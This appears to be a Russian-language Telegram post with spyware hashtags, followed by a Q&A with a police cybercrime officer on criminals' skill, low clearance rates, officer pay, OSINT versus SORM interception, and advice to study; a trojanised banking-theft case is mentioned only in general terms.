2022-11-23 12:49:12
#spyware #surveillance #NSO #FBI #USA #Israel #PegasusSpyware #Predator
2022-11-23 12:17:34
Как там в МВД (2)?А вот и ответы на вопросы от сотрудника полиции, работающего по линии противодействия киберпреступности. Это, конечно, не интервью. Я лишь задал вопросы, которые интересуют меня и попросил разрешения опубликовать для дорогих коллег.1) Как часто сталкиваешься с реально опытным и умным кибернегодяем?Очень редко. Как правило, опытный и умный злоумышленник сделает все так, что жертва обнаруживает факт утраты в самый последний момент. Однако, не могу не вспомнить случай, когда подобные злоумышленники написали "одну программу", которую скачал наш заявитель (а он был не один такой), а потом, как оказалось, он вшил кейлоггер и возможность удаленного доступа в ПО. Так, злоумышленнику удалось скрытно и довольно долго обворовывать жертв через Онлайн-банкинг.2) Малый процент раскрываемости киберпреступлений - "заслуга" злодеев или недоработка системы?Все вместе. Ты прекрасно знаешь, какое количество глупых лжеминирований сейчас. По каждому факту минирования возбуждается отдельное уголовное дело, что увеличивает общее количество уголовных дел. Соответственно, мои 20 раскрытий (которые дались не одним месяцем работы) накрываются 120 минированиями. Одновременно с этим, не могу не отметить падающий уровень технической образованность сотрудников. Потому что перед каждым встает вопрос: при нормальном стеке знаний, зачем мне получать 50-60 тысяч рублей в МВД, если я смогу это сделать в частной компании за 90-100 тысяч.3) Насколько помогает OSINT и часто ли может сыграть ключевую роль в раскрытии преступления? Может ли дать больше, чем СОРМы, ответы на запросы и прочие процессуальные процедуры?Помогает, причем существенно. Однако, больше СОРМ не даст никто. Весь вопрос в достоверности информации. Так вот, в СОРМ (при грамотном анализе и постановке задач специальным подразделениям) такая достоверность близка к 100%. Говоря о пользе OSINT, нужно понимать, что благодаря этому направлению мы знаем (знали), где искать и что смотреть. Люди зачастую в цифровом пространстве не такие бдительные, как жизни. Однако, встречаются обратные случаи, тогда СОРМ спасает.4) Ты наверняка замечал, что киберпреступность становится все более и более широким понятием. С ней сталкивается не только Управление К, но и различные отделы уголовного розыска, линия терроризма и экстремизма также связана с этим, линия экономической безопасности. Какой совет/наставление дашь тем, кто собирается идти в полицию или уже начал работать, но не обладает техническими знаниями от слова совсем?Учиться и еще раз учиться. А лучше - выработать в себе желание обучаться. Не просто так говорят, что преступность сейчас на шаг впереди. К сожалению, такая тенденция будет еще долго. И дело тут не сколько в сотрудниках, сколько в укладе общества в целом. Смоделируй обычное преступление: увидишь, что полиция как "дефенсы" при обычной атаке, а преступники - атакующие. При таких раскладах, дефенсы должны быть просто готовы к любым нападкам со стороны злоумышленников. Возвращаясь к началу вопроса, отмечу, что такая готовность может быть обеспечена исключительно через постоянный прогресс.